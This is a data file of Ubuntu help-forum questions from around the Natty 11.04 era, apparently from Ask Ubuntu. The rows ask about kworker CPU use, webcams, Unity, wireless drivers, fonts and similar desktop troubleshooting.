33640	kworker , what is it and why is it hogging so much cpu ?	i recently upgraded to the kubuntu natty beta 1 and i 've been having a lot of issues with the process kworker . at moments it uses almost half my cpu . also , strangely enough it seems to affect my usb ports ; whenever i plug in an usb drive , the process kworker goes into hyperdrive , leaving me unable to work . i have thought about filing a bug but since i have n't even found any reasonable explanation on what kworker is i figured i should find out first .
33641	bash script to start and then shutdown/restart various processes	when i start up my development environment , there are a variety of processes i need to run in the background . it is a pain to start them all individually so i want to write a script that starts each one . i can do this just fine but the problem comes when i need to restart them ( something i will need to do regularly ) . what is the easiest way to capture the process upon starting it and saving that information so that when i run the script again , it will check to see if that information has been saved and then close down those processes before restarting them . i also want the script to be flexible enough such that if i shutdown the process manually , it will a ) not throw an error if it ca n't find the process and b ) not accidentally shut down some other process that has since then shared whatever identifying information i have stored . update more specifically , i want to at least do the following at the moment : 1 ) type a short command like `` start-dev '' 2 ) execute the following ( note that i want the second and third commands to run in the background and am using & to do so but not the final command as i want to see the output from passenger as it runs ) : change to my working directory start faye as a background process start watchr as a background process start passenger so far i have got this # ! /bin/bash cd ~/path/to/my/working-directory rackup faye.ru -s thin -e production & watch refresh.watchr & passenger start this works fine but the problem comes when i need to restart all these processes . i first have to track down all their process ids and then kill them before running start-dev again . therefore i would like to : 4 ) type a short command like `` restart-dev '' which tracks down the processes i have previously run in the background and then kill them before running `` start-dev '' again . it needs to be able to not throw an error if i have shut down any of these manually and not accidentally shutdown an incorrect process .
33642	rename a file during install of a debian package	i have a python script that i want to package for debian . i use a debian/install file where i wrote auto_dice.py /usr/bin/ linitan then complains about the .py extension ( script-with-language-extension ) . i then changed it to auto_dice.py /usr/bin/autodice.py which causes an error because it interpreted autodice.py as a directory . how can i do the rename there ? i do not want to rename my python script in the sources .
33647	virtualbox looses gtk theme after system update	everyone once in a while when i do a system update , virtualbox looses its gtk theme . i think it 's when the kernel updates . i usually end up uninstalling and reinstalling the virtualbox packages to fix it . why does this happen , and is there a light weight fix ? edit : adding a new screenshot showing other gtk apps .
33649	guest has mini freezes on virtual box	ubuntu 10.10 starts to have mini freezes every 2 seconds . if i am typing in any sort of input ( for example the terminal or a text field in firefox or a text editor ) , i can type a few letters and then the entire os will freeze for about half a second and i will lose focus . i can then ( if i 'm quick ) click back into the input and continuing typing before it freezes again . this will continue until i try and do something like close firefox , kill/start a process from the terminal or save my work from a text editor . at that point the entire system locks up and i have to force the virtual machine to close . i only experience this if ubuntu has been running for some time with a minimum of roughly 1 hour . i am running ubuntu as a guest on virtual box ( version 4.0.4 ) from inside a windows 7 host . windows itself does not freeze or become inoperable at all during this time . the only thing i can do is to restart ubuntu and get as much work done before it decides to freeze again . very frustrating . what steps can i take to solve or further troubleshoot this problem ? update following takkat 's instructions , i was already doing the following : had vt-x/amd-v enabled latest version of virtual box guest additions installed disabled 3d acceleration enabled nested paging ram set to under half of total system ram ( 3gb out of 8gb ) in addition , i did the following : disabled screensaver in ubuntu reduced cores from 2 to 1 increased video memory this seems to have completely fixed the problem . thanks !
33651	java installation for solaris studio 12.2	i have solaris studio almost working . my only issue seems to be java . here is what i get : ============================ aflory @ aflory-laptop : ~ $ solstudio & [ 1 ] 1723 aflory @ aflory-laptop : ~ $ solaris studio is unable to find a supported version of java . solaris studio supports java version 1.6.0_13 and newer and looks for a valid java installation in the following order : 1 ) location specified with -- jdkhome command line option 2 ) in path environment variable 3 ) at /usr/jdk/latest location , if exists 4 ) at /usr/java location , if exists 5 ) at /usr location , if exists ============================ i try typing -- jdkhome in the console but i get an command not found error . i have added the following to my /home/aflory/.bashrc file : path= $ path : /usr/java/jdk1.6.0_24/bin : /home/aflory/solstudio12.2/bin export path i am running ubuntu 10.04 64bit . i tried installing the 64 bit version of java jdk , then i tried installing the 32bit version of java jdk . i do n't believe there is a 64bit version of solaris studio .
33652	how to automatically graph the output of a shell function	i do a lot of video editing and processing , and spend a lot of time looking at the output of command line programs like ffmpeg . ffmpeg produces a regular output of the form frame=1234 fps=80 q=-1.0 size= 23456kb time=1234 bitrate=280.0kbits/s frame=1237 fps=80 q=-1.0 size= 23678kb time=1258 bitrate=280.0kbits/s ... my question is , is there a command line program that could automatically graph the output of this ( preferably live ) ? so you could write ffmpeg -i inputfile.avi -lotsofoptions -outputfile.avi > graphprogramorsomething and it would produce a nice chart showing how the fps and things varied throughout the whole process . not really a mission critical request but would make the wait much nicer ...
33654	is it possible for ubuntu to talk to a windows 7 homegroup ?	i suspect not , but i 'm curious , after tearing my hair out over trying to get a printer to work over the network ( ubuntu to win7 ) and the problem being simply that it was being shared over homegroup , not workgroup . for anyone who stumbles on this question looking for help - if a printer is automatically shared via homegroup , that does not mean it is shared over the workgroup . to share over a workgroup requires you to have a valid set of credentials on the windows machine . anyhoo , i know homegroup and workgroup work via different protocols . my question is , is there a shim to make ubuntu talk to a homegroup , or are we stuck networking with windows like it 's 2004 ?
33655	best nes emulator ?	i have tried two emulators and megaman 2 has issues running on gfce ultra nes emulator where megaman disappears when hit . gceux has sound problems .
33662	video recording in ubuntu	what video recording software is there that matches ( or better ) than the software version in windows for fraps and wegame ? already tried istanbul ( honestly it sucks ) and the last update was when dinosaurs ruled ; ) http : //live.gnome.org/istanbul then i tried recordmydesktop which is very good but in only saves in ogg . it also has not received any updates since king kong and godzilla did the tango ; ) http : //recordmydesktop.sourceforge.net/news.php also tried ffmpeg with the command line option to screen capture . good also but.. am looking for a gui friendly ( friendlier than gtk-recordmydesktop ) recording program for ubuntu that has options to several formats and quality ( like the options when saving a video in openshot which has a very nice system to select the quality and objective of the video like youtube , vimeo , etc.. ) and that it uses correctly cpu , memory and not kill the system for recording in 2d , 3d and opengl ( via wine ) programs .
33665	use webcam to record ( including movement detection )	what ubuntu software is there to use the webcam as a recording camera ( like a security system ) . it needs to detect movement in the room , take pictures and/or record .
33672	joystick acts as mouse ; wo n't stop	joystick acts as a mouse , even when i 'm playing a game that uses a joystick so i get random mouse events going on . i plugged a joystick in to play spiral knights , also installed joystick and jcalibrate . everything is working good , except by default the joystick moves the mouse around and the button activate mouse keys . now normally this would be good behavior if i 'm on a myth-box or something , unfortunately when i play spiral knights with joystick input i see my mouse cursor moving in the back ground and when i hit a button it thinks i 'm pressing right-click so it minimizes everything . also it creates folders and probably deletes stuff . so , basically how the heck do i stop it from acting as a mouse ?
33676	how to configure an usb ddr dance pad for stepmania ?	i have stepmania running and my official dance dance revolution dance pad from ddr universe 2 , but i ca n't get the former to work with the latter . lsusb says : bus 002 device 003 : id 12ab:0004 honey bee electronic international ltd . i tried to look at the relevant ubuntu documentation for lucid lynx 10.04 lts , with no luck .
33681	how do i quickly access the unity launcher ?	quite a basic question : i 've noticed that to show the launcher when it 's hidden that i have to move the mouse to the top left of the screen , rather than simply move the mouse to the left edge of the screen . is this a bug or is it like this by design ? if so , is there a way to make it show when the mouse is at the edge ? secondly , is it possible to prevent the launcher from only coming half into view if the mouse is moved slowly over the menu button ? sometimes i want to show the launcher but i 've moved the mouse too slowly ( usually because the pointer was already in the vicinity ) .
33697	how do i add a swap partition after system installation ?	i did not opt for a swap partition during ubuntu installation . later i freed up some space , and made a swap partition . now after booting up i am manually opening gparted and right-clicking the swap partition and turning it on using 'swapon ' option . how can i automatically enable the swap partition every time ?
33702	webcam software that takes pictures at regular intervals	i have just moved from my old webcam to a logitech quickcam pro 4000 ( or so ) . yes , i know it 's an old webcam . i just replaced an older one , a quickcam chat . with the old one , i used camorama with a very specific incantation to make the gods of v4l happy . with the old quickcam , i had two main uses . the first was that it was a rear-view mirror that i had set in a window in the corner of my monitor , so the motion would tell me if people come up behind me . the second is to take a picture every 20 minutes or so , so i can keep track of my beard growth , etc . both of these were very easy to set , once you 1 ) found the magical incantation to appease the v4l gods and 2 ) set the color correction so you did n't look quite so blue . i now have the pro working . it talks to vlc . it talks to cheese . it talks to the gmail chat website . what it does not do , that i can tell , is work with camorama . i do n't mind this . honestly , software that 's been abandoned for 4 years in the state it is , that 's well worth escaping . but i ca n't just keep cheese open because it ca n't be set to take pictures . and i ca n't just set a crontab with streamer -c /dev/video0 -b 16 -o outfile.jpeg because then i lose my rearview mirror . do i have to look into rolling my own webcam software here ? forking cheese to get my scheduled picture-taking ? or is there a webcam program that does what i want that i just do n't know about yet ?
33708	if i encrypt my home folder during installation , can i do another clean installation over the entire hard drive ?	let 's say i install ubuntu 10.10 with an encrypted folder or hard drive , and i plan on doing a clean install of ubuntu 11.04 . will the encryption cause an issue ? or will it still be as simple as popping in the cd and clicking button ? does encryption cause noticeable performance issues ? would i be able to copy some files onto an external hard drive if they are encrypted ? or will i have to decrypt them before copying ?
33710	what exactly is a `` lens '' ?	i 've seen a number of questions about lenses , and i 've picked up enough to work out that it 's something to do with the unity shell in natty , but i have n't really worked out exactly what is meant by it . so can someone give me ( or link to ) a good description of what a lens is ?
33716	how can i configure default fonts by unicode blocks or single codepoints ?	i have the following vexing problem i 've been trying to solve for weeks now , to no avail so far . *warning overly long question -- -in short : * what i need , in essence , is a system-wide way to exactly define what fonts will be used to display a given unicode codepoint . ideally , this decision would be made by referring to unicode code blocks , with a way to give fallbacks for missing codepoints and , super-plus , to define overrides for single codepoints . i have found no solution so far , and many descriptions on the net seem to be outdated for ubuntu 10.04 . helpful answers do include explanations or pointers to how the current ubuntu font rendering is intended to work , and what you can possibly configure at all . *long explanation : * i work a lot with unicode characters from the so-called 'astral planes ' , that is , with codepoints beyond unicode 's original 16 bits . now there are many situations -- -browser address bar , terminal , text editors -- -where fonts can not be configured the way you would do , say , in a word processor or an html/css file , where you can explicitly define the font for each character to be displayed . instead , in each such application , precisely what image will appear is a result of fonts installed on the system , application-wide settings , possibly font system configuration , and , it would seem , your good or bad luck . for the purpose of working with chinese/japanese/korean ( cjk ) characters i have installed sun-exta . ttf , sun-extb . ttf , and babelstonehan . ttf , alongside with quite a number of other fonts , including the default ubuntu offering . also , i have ( under wine ) babelmap and do all of my editing in komodo edit 6.1 . komodo is configured to use dejavu sans mono , which i find sufficiently pleasant to work with . by way of system-wide glyph substitution ( i believe ) , i am getting a lot of correct images for cjk codepoints . however , i am not entirely sure those images do indeed originate from the the fonts mentioned above . you see , the cjk blocks contain well over 70000 codepoints , some with subtle differences , some with negligible variants , and some being outright copies . it 's a surprisingly hairy subject . basically you can only successfully work in this field if you can be absolutely sure what a given codepoint is intended to look like , and the most faithful renderings i have found are contained in the fonts mentioned above . unfortunately , ubuntu seems to mess up quite a few codepoints . take , for example , u-cjk/5f50 彐 u-cjk-rad1/2f39 ⼹ u-cjk-rad2/2e95 ⺕ in all applications -- -including firefox without the proper css , and komodo -- -these three codepoints look exactly identical on my machine . however , if you look the characters up in a source like http : //www.longwiki.net/ % e5 % bd % 90 ( 彐 , ⼹ , ⺕ ) , which , in my experience , has very well selected gifs for the characters in question , there are subtle differences between these three codepoints . i am not so happy that unicode chose to define so many virtually-identical codepoints , but then cjk encoding has been known to be quite a hard problem for decades . now i do have fonts ( here it 's sun-exta . ttf ) installed that render these three codepoints with the intended looks , but my feeling is that these fonts never get a chance to render because ubuntu or whoever at some point intervenes , declaring that all these codepoints should be conflated to a single one . or maybe it 's some font that ubuntu considers the correct font for these codepoints that does the conflation . let me show you why it is highly unlikely that this is the correct and desired behavior : from the list above you can see the codepoints reside in three different unicode blocks , namely cjk unified ideographs kangxi radicals cjk radicals supplement respectively . the unicode consortium has developed a pretty strange viewpoint on the so-called 'radicals ' , which means they treat them as 'symbols ' ( for symbols of sections in dictionaries ) , not as 'characters ' ( which you use to write texts ) , which i believe is plain bollocks . this policy drives unicode to include a character like 馬 'horse ' more than one time , as u-cjk/99ac 馬 u-cjk-rad1/2fba ⾺ which to me is plain and simple a case of unwarranted codepoint duplication , and it 's a stated policy of unicode that these points show the same but are to be treated differently . now while there are known and admitted cases of inadvertant character/glyph duplication ( where some comittee got drowned in the myriads of codepoints and admitted a character more than once -- -other codesets suffer from that problem , too ) , this is highly unlikely in this case . the two radicals blocks are but a few hundred codepoints long , and the supplemental one was added only after the introduction of the primary 'kangxi ' radicals block ( even the naming is whacky ) , for the sole purpose of differentiating glyphs . therefore , given the assumption that it is highly unlikely such a doublet was introduced by error ( any first-year student of chinese could check those short lists for correctness -- -that 's what you spend a lot of time with when learning chinese , sorting out and remembering all those near-lookalikes ) , we must conclude that a difference in appearance at least between two of the codepoints was fully intended by unicode , and , therefore , my computer is wrong in trying to convince me they should look the same . another glitch i have noticed is that some intermittent codepoints are definitely displayed using another font than most others ; as an example , the three codepoints in the first group below are rendered by some sans-serif font ( possibly from the ume gothic or wen quan yi series ) , while the second is rendered in song style : u-cjk/534b 卋 u-cjk/5359 卙 u-cjk/535b 卛 u-cjk/534c 卌 u-cjk/534f 协 u-cjk/535a 博 this behavior can be observed both in gedit and komodo edit , so i can be pretty sure it happensx on the os level , not within the application . observe that the codepoints in question are immediately neighboring ones , so my guess is that the default song-style font has a few missing codepoints , and ubuntu believes a sans-serif font to contain the best alternatives for those points -- -and gets it wrong , since , after all , the installed sun-exta.ttf does have a complete coverage of song-style glyphs for this block of unicode ( that said , i have never seen a glyph substitution system that really works ) . above , i mentioned babelmap , which is quite an useful tool for doing character encoding work . one of the outstanding aspects of babelmap is that the glyph table can be configured in a very manageable way to use specific fonts for each unicode block . i 'd actually like to have even more fine-grained control for a few border cases , but this is as good as it seems to get in this age .
33717	unity file lens giving useless or no results	i just installed natty fresh on my laptop , and for the purposes of this experiment , i have one file on my system . my downloads , documents , music , etc are all empty , but pictures contains one file named `` tornado.png '' . if i simply hit the super key and search through that main lens , i do n't get results for `` to '' , `` torn '' , or even `` tornado '' -- only for `` tornado.png '' . and , if i search using the files lens ( super+s ) , i get no results at all , even for `` tornado.png '' . is this not getting indexed properly ? what 's going on ?
33722	how do i preseed the installer to use a specific locale ?	i am doing a preseed ( actually only ask the keyboard map and timezone ) of lucid lynx install and trying to use the same locale that i selected in the boot screen , i.e . if i select french lang i want to set the same when ubiquity starts and see the ubiquity slideshow in the locale previously selected . i did a little test , edit the file langlist in the isolinux directory removing all the languages that i do n't need , and replaced fr with fr_fr.utf-8 and surprise ! all the ubiquity screen shows in french , the problem was when the installer finished the language in the os was english : ( anyone has tried this before ? any clue ? howto ? manual ?
33723	unity launcher hotkeys does n't launch a new instance of my application	i 'm not quite sure , if i can pinpoint what caused this , but now the super+1 , super+2 , etc.. hotkeys to launch applications on the launcher do n't respond at all . nor do super+a and super+f , but super+s for expo does . any ideas as how to troubleshoot this ? ( when i hold them down and type them , the letters just fall through to the application in focus ) .
33724	what is the meaning and format of language ?	i 'm used to environment variables such as lang and lc_* , but i recently noticed a language variable on my ubuntu desktop . it 's value was pt_br : pt : en , and i 'm wondering exactly what is meaning is . lang , for one thing , was pt_br.utf-8 , so if that first field is supposed to be the default locale/charset , it was at odds with was lang set . so , what 's the exact meaning and format of language ?
33730	will changing password re-encrypt my home directory ?	i need to change my user password . do i need to take any extra steps for my encrypted home directory to become inaccessible with my old password and only accessible with my new password ?
33733	unable to login to desktop , keeps returning to a terminal	aloha , i'have been tried for several times updated software packages or drivers . but always facing the problem . i ca n't log in to the dekstop , just at the terminal , it ask for username and login password . ater entered the username and password , still at terminal.. that 's all..
33737	creating new user with 'system- > administration- > users and groups	when i try to add a new user using the gui users-admin , nothing happens .
33744	how can i update google chrome ?	i am running ubuntu maverick under vmware on windows to make sure the code i write works on various oses and browsers . i do n't use it as my primary operating system . i ca n't figure out how to update google chrome dev channel i installed a while ago . i ca n't do it via the `` about google chrome '' like in windows . update manager lists 317 mb of updates and does n't seem to let me search them or deselect or . they are not even in alphabetical order but i ca n't see chrome in there . ubuntu software centre under get software/google/google-chrome-unstable/more info says `` version : 12.0.725-r80304 '' which would be the latest , but running crhome , the `` about google chrome '' dialog tells me it is `` 11.0.686.1 dev '' what am i doing wrong ? by the way is `` unstable '' a synonym for `` dev '' in google chrome . ubuntu software centre only lists `` beta '' , `` stable '' , and `` unstable '' but not `` dev '' .
33747	monitor switching when closing the lid of notebook	in the office i use my notebook with an external 22 '' monitor . so i do n't need the notebooks lcd and i would like to simply close the lid . but everytime i do this ubuntu switches the resolution . how can i avoid this ?
33748	getting rid of minefield ( firefox daily build )	now that firefox 4.0 is out , i 've removed minefield that i had previously installed via mozilla-daily . my problemis that i ca n't get rid of it , i mean it still appears in gnome menu ( with missin icon error ) , in right click context menu under `` open with '' submenu . i checked synaptic and there 's no trace of firefox-4.0 . how can i completely purge minefield from my ubuntu ?
33751	making any key into a modifier key	when one presses and holds down certain keys like control , alt , super , no release event is generated while with other keys multiple release & press events are generated simulating the key being pushed & released several times . i want to make some of the multimedia keys or the fnkey on my keyboard into modifier keys , and xev shows , that all of them are of the second type . is it possible to make ordinary keys sticky so that no release event is generated ?
33754	how do i build openssh from source ?	i try install openssh ./configure checking for openssl/opensslv.h ... no configure : error : * openssl headers missing any idea ?
33760	when is the hebrew/arabic ubuntu font due to be implemented ?	reading canonical design 's post 4 months ago made me really intrigued using 11.04.. yet , we 're already in beta 1 , feature freeze and all , and no fonts . is this still due to be implemented in this version ?
33767	how to backup a whole wordpress site ?	how to backup a whole wordpress site from ubuntu ? there is a program like winscp to use it for backup , or it is not necessary ?
33773	what to do when skype freezes silently ?	i start to use ubuntu rather recently at work . among colleagues we are used to be always available on skype . unfortunately , on my machine , skype sometimes freezes without making me aware of that . so , i think i am online , but for the rest of the world i am off . what can i check/do ? such behavior may show up 2/3 times a day . to restart skype , it is necessary to kill the proccess form the terminal ( ctrl-q does not work ) . thanks for your patience .
33774	how do i remap the caps lock and ctrl keys ?	i 'd like to remap my keys such that ctrl behaves as the caps lock key and vice-versa . also , if possible i 'd like the settings to be available only within the currently logged-in user . how can i achieve this ? i 'm a vim user , unlike the other people who use this machine , so i 'd like those settings only for my account .
33775	where is anacron mailing job output ?	i have a job that is run by anacron . in the syslog i see messages like : apr 6 06:11:09 host anacron [ 1031 ] : job `myjob ' terminated ( mailing output ) but i never see that mail . if i run that same job through cron the output is mailed to /var/mail/username . where is anacron mailing the output ?
33778	no picture with s-video	i have bought an s-video cable so as that my old tv can be used as a second monitor , for watching iplayer etc . i have an s-video to scart adaptor for the tv , ubuntu knows there is a tv there and has set the correct resolution , but the tv shows no picture ? ?
33783	assign fixed path to printer ( /dev/usb/lp0 )	i have two usb printers . they are assigned a path depending on the order of turning them on . the first one is /deb/usb/lp0 and the second one /deb/usb/lp1 . however , i sometimes echo to these printers directly and need to know which one is lp0 and which one is lp1 . can i assign a fixed path in some way ? thanks !
33784	how to change font size and/or screen resolution in virtual terminals ttys 1-6 ... ?	the default font size in the non-x terminals is too small for me . how can i changed it permanently ? i 've ran sudo dpkg-reconfigure console-setup in tty 1 , but seems to only effect the 'gnome-terminal ' running courtesy x in tty 7 ... update ... i 've just checked more carefully ... it actually did changed the font , from 8-14 ( it only offers 8 14 and 16 ) .. the width of each char did not change ; they only got taller ( ie . fewer lines on the screen ) ... i 'm getting 160 characters across the screen ( on a 17 '' crt ) . that makes it impossible for me ... so it seems like it may be a screen resolution issue , and not a font issue ( unless i can choose a larger font size somehow ) so the question is now.. either : how do i change the font size to larger than offered by sudo dpkg-reconfigure console-setup ... or : how can i reducet the screen resoluton of ttys 1-6 ?
33785	alternative for exchange 2007 mail and calender sync and shared + public calenders and folders ?	i am trying to replace my windows 7 system with a working ubuntu system but i am running into issues with several software being used at work . could anyone please advise alternatives for the following software / tools ? exchange 2007 mail & calendar sync ( evolution is too slow to load mails and calendar ) shared & public calendars and folders
33786	transfering files with ftp	how can i transfer files to and from a remote system using ftp ?
33789	how do i integrate byobu 's copy-buffer with the x clipboard ?	i want to be able to copy and paste between byobu and firefox without having to use a mouse . i could write the copy buffer to a file and open that file with gedit but i was wondering if there was a more elegant way .
33790	how do i install windows wireless driver for tp-link tl-wn7200nd	i 'm using the tp-link tl-wn7200nd usb wireless adapter . i have downloaded the windows drivers and updated ubuntu to 10.10 by manually connecting the computer to the router . i also installed ndiswrapper-gtk . i get a windows wireless drivers in my administration menu , and i was able to get it to read the windows 7 .inf file . the .inf for xp does not work . it adds it and the driver appears in the list with `` hardware : present '' . i set up the wireless connection information ( essid and wpa2-personal key ) . problem : i do n't see the network manager icon in the top right of the screen . i managed to manually start it manually using sudo services network-manager restart but it shows no connections in the menu , saying that there 's nothing to manage . in my /etc/network/interfaces file i have an entry for the loopback and the standard two-liner for eth0 with dhcp . from memory , something like : iface eth0 auto eth0 dhcp i had read somewhere that 10.10 would have standard support for my wireless adapter ( tl-wn7200nd ) but that seems not to be the case . however , i do n't ever remember having the network-manager icon in the top-right and it does not auto-start at the moment . this was originally an ubuntu 9.10 install that i 've upgraded over time . i also used to use pppoeconf to connect to the net , which might affect the /etc/network/interfaces file ?
33793	printer not using full page width	i have an epson lx-300 printer driver , but i can not get it to print on the full width of a regular us letter page . whatever i configure , the printer just prints about 60 % of the page width . as if the page were very small , leaving large empty spaces . i have tried printing from firefox , chrome , and openoffice . i have tried setting the `` paper size '' to different settings . i have taken out all margins . i have used `` adjust to fit on page '' and printed on `` 100 % '' ( and 150 % and 50 % âž . i have installed the printer under ubuntu 10.10 using this tutorial : http : //all-about-ubuntu.blogspot.com/2008/12/epson-lx-300-printer-driver.html , and i have tried using this driver : http : //www.openprinting.org/printer/epson/epson-dot_matrix . i have also tried by just using ubuntu default setting . all of this has given no results . i can not get this printer to print on the full width of the page . anybody any idea ?
33796	can i alt-tab while dragging a chrome tab ?	i 'm a newb ubuntu user , coming from windows . on windows , i could pick up one chrome tab , alt-tab to find another chrome window , and place it there . i find that this does n't work on ubuntu/gnome . can it be made to work ?
33800	how to recover deleted files and folders ?	how i can restore files and folders . i 've deleted my home folder recursively . : (
33801	update an entry in the messaging menu without having to logout	i 'm trying to write a script that will create an entry in the messaging menu that shows your to-do list . this way , each item would be a shortcut , and clicking on an item would mark it as done . i know how to add an entry to the menu , and i know how to add shortcuts below it . my problem right now is having them update in real time . as it is , if edit /usr/share/applications/foo.desktop to include more shortcuts , my messaging menu entry for foo only updates after i log out and back in again . how can i change that ? is there a command i can run to update the messaging menu ? is there some other workaround ?
33803	how do i fix the slow scroll in browsers and high xorg cpu usage	i am facing an issue while scrolling in browsers ( firefox , chrome , and opera ) , scroll is jagged and slow . also when scrolling the cpu usage spikes . i am currently running ubuntu natty ( beta 1 ) , switched from ubuntu 10.10 where the problem was worse . i am using the nvidia beta driver , which ubuntu installed automatically . my graphic card is nvidia quadro nvs 150m . i tried running ubuntu without the effects on , but when using multiple applications at the same time xorg usage spikes again . additional info : 2gb of ram and an intel core 2 duo processor . any help would be greatly appreciated . thanks in advance !
33808	does purchased music count against my storage quotas ?	for some reason i was under the impression that music purchased from the ubuntu one store did n't count against my storage quota , but after i purchased a few albums i see that i haves less storage available . is purchased music supposed to count against your ubuntu one cloud storage quota ?
33811	what are the different innerworking functions between a live cd and full install ?	1 ) what specifically internally makes my `` livecd with persistence '' install on my usb stick run faster than my full install on my usb stick ? 2 ) what would i have to change in my full install system to make it a `` livecd with persistence '' system ?
33812	network manager download	where i can download the network manager for meerkat ? ( .deb file , please )
33813	three monitors supported on nvidia card ?	i have a nvidia geforce gtx 460 and have been trying to figure out if it has three monitor support . i tried plugging in three monitors and the card does pick all three up . after i set them up , save the xorg.conf file and restart , only two of them come up active . i 've tried looking around the web to see if maybe it only supports two . anyone have more info ?
33818	lost wireless connection and detection	my laptop lenovo t400 lost its wireless connection and could n't detect the available wireless networks , immediately after i moved my laptop from one desk to another . i am not sure if moving it physically is the reason , but occasionally it is followed by losing wireless connection and detection . i tried the following ways that i know to restart the wireless network card but could n't make it work : # 1st way $ sudo ifdown wlan0 ifdown : interface wlan0 not configured $ sudo ifup wlan0 ignoring unknown interface wlan0=wlan0 . # 2nd way $ sudo ifconfig wlan0 down $ sudo ifconfig wlan0 up siocsifflags : operation not possible due to rf-kill # 3rd way $ sudo /etc/init.d/networking restart * reconfiguring network interfaces ... [ ok ] i was wondering what the above three ways mean and how they differ from each other ? am i using them wrongly in order to restart my wireless network card and make it work ? thanks and regards ! p.s . i have both gnome network manager and wicd installed on my ubuntu 10.10 . but i have exited wicd , and it does not help . update : i followed the link https : //help.ubuntu.com/10.04/internet/c/troubleshooting-wireless.html . the following command $ sudo lshw -c network says my wlan0 is `` disabled '' , although it can find the wireless device wlan0 and gives information about it , such as the product name , vendor , phisal id , bus info , and clock frequency etc , which might suggests the wireless card is in place . in such case , the link asks me to `` check that the device is onâ : many wireless network devices can be turned on or off . check to see if there is a hardware switch , some devices can be switched off from windows and may need to be turned back on from windows . as i did not switch from windows , i was wondering how i now check if there is a hardware switch ? how can i turn my wireless network device on ? thanks !
33820	not able to open file directories from gmrun	i have been using gmrun to launch programs like run dialog in the windows . one thing annoying me is i am not able launch file directories from gmrun . i am entering the path in gmrun dialog box and enter ok..nothing happens after that.. it would be very nice if we can do that.. is there anything i am missing here ? i am using pure ubuntu 10.04lts with gnome desktop .
33822	alternatives for google talk and cisco vpn ?	part 3 of my question . i am trying to replace my windows 7 system with a working ubuntu system but i am running into issues with several software being used at work . could anyone please advise alternatives for the following software / tools ? google talk using proxy ( empathy does n't work with proxy servers ) cisco vpn client - ( vpnc fails to connect and cisco linux vpn build locks up any dual core system after using it for some time ) .
33823	alternative for remedy client , at & t webex and ms office communicator ?	part two of my question . i am trying to replace my windows 7 system with a working ubuntu system but i am running into issues with several software being used at work . could anyone please advise alternatives for the following software / tools ? remedy client at & t webex ( currently works only with rhel 5.1 & lower + ff 3.0 & lower ) ms office communicator
33829	how do i find hardware information about the fan in my laptop ?	can you help me with finding all the hardware information ( parameters ) and configuration files about the fan in my laptop ? i 'm interested in commands that will find that information and configuration files .
33837	how can i subscribe without a credit card ?	how can i subscribe to ubuntu one without owning a credit card ? is it possible to pay the subscription fee with paypal , for example ?
33842	why is couchdb installed ?	i do n't recall installing a couchdb package . what other packages may have installed this ?
33845	how to add exports to fish like in .bashrc ?	i just wanted to be able to add inside some fish configuration file ( do n't know which/where ) the same function as this : export perl5lib=/home/iaco/workspace/perl : /home/iaco/devtools this line was added inside the .bashrc file and it was able to export the variable each time i opened a terminal . is there something like that for fish ? i know that i can export variables in fish using the `` set '' command , but i want to modify one file ( do n't know which one ) in order to automatically add those variables each time i open a fish terminal . thanks for your time !
33846	unity crashed , how can i report that to developers ?	im on ubuntu natty and experiencing some weird random restarts of unity . this started happening after i installed conky and set compiz to remove its shadow . the restarting could possibly be attributed to that . i did on the otherhand remove ubuntuone and evolution from the default installation too.. but since this didnt start happening before the conky installation , i highly doubt that this is the cause . so here is the terminal output right before it dies . http : //paste.ubuntu.com/590448/ i need to figure out what could be causing this crash , and the log seems to me like ancient greek ... so far , it seems to restart when i click on some unity-aspect of the desktop , like the titlebar , the message-indicator , the lens , or even switching to desktop . and so , i open the stage up for you guys : d
33847	can not read /dev/video0	hello i have read that all entries in /dev are set up to work as if they were regular files . after plugging in my webcam , the os creates /dev/video0 automatically . i then do : maxtor @ lounge : ~ $ sudo cat /dev/video0 > vyd [ sudo ] password for maxtor : cat : /dev/video0 : no such devicemaxtor @ lounge : ~ $ i was hoping that it would put a frame of video in 'vyd ' . so why wont it ? starting cheese , next , works ; so everything seems to be in order .
33849	can not control volume in tvtime	i just installed tvtime , but i can not move the volume value from 0 , no matter if i use the left/right keys on the arrow-pad . i edited the tvtime.xml 's audioboost value to 1 , but that did not change anything . is there a way to configure tvtime to allow for the value to be adjusted ? edit : i am using a hauppauge tv-tuner card as well .
33852	can unity display a launcher icon for spread mode ?	there is a launcher icon for expo mode ( super-s ) located in the launcher . is there a way to put a launcher icon for spread mode ( super-w ) in the launcher ?
33854	how do i do a screenshot of the desktop cube ?	is there a way to do a screenshot of the rotating cube ? i ca n't get it to work while i am rotating the cube .
33855	how do i get a broadcom bcm4312 wireless card to work ?	i am currently using ubuntu 10.10 on my laptop , the model of my wireless chip is broadcom bcm4312 802.11b/g lp-phy . i tried to activate the driver for the chip by going to system - > administration - > additional drivers and activated broadcom sta wireless driver . but the laptop ca n't detect any wireless signal still . do i have to do any additional work to make the chip work ? or how can i test if there is physical damage to the chip itself ?
33859	is there a gnome3 stable ppa ?	is there a gnome3 stable ppa yet ? or will it become available in the natty repositories later this month ?
33860	reinstalling openoffice.org	i removed openoffice.org and installed libreoffice about a month ago . libreoffice can not spell-check and i would like to go back . however ubuntu gives me dependency problems and i can not reinstall the ooo suite .
33863	will gnome 3 replace my current gnome session ? or will i be able to use both ?	i saw that there 's a ppa for gnome 3 . i also noticed that it installs as another package . so my question is ... if i install the gnome 3 package , will i be able to still use my current gnome ? or will i be able to use only gnome 3 ? thanks for any/all help !
33873	how do i tell if ubuntu supports hardware-accelerated graphics on my laptop ?	the new gnome 3.0 requires hardware acceleration support . i wanted to try it out -- but how do i tell whether hardware acceleration is supported on my machine ?
33876	is it not possibly to upgrade to natty using a live cd if there are multiple systems installed ?	i tried to upgrade my system ( wanted to ) , but the option was not available . instead i was offered to install side by side or replace my current system . is it not possible to use the upgrade method if multiple systems are detected ( if not - shall i report a bug ? )
33877	two finger scrolling not working	my question is related to this question in askubuntu . yesterday , i tried installing ubuntu 11.04 . the problem with my touchpad still persists . although the touchpad section in mouse says two finger scrolling is enabled i can not get it to work . so , shall i report a bug or carry on with external script for touchpad functionality ?
33879	use external monitor instead of faulty laptop monitor	my laptop monitor is faulty and i am planning to use it as a 'desktop ' . i bought an external led monitor . but when i connect it to my laptop via hdmi , the desktop gets extended . what i really want is to turn off the display on my laptop and use the external monitor , not dual monitor . how to do this .
33880	how can you resize the icons in the unity dash ?	the icons in the panel are way too large for my preferences , how can you resize them ?
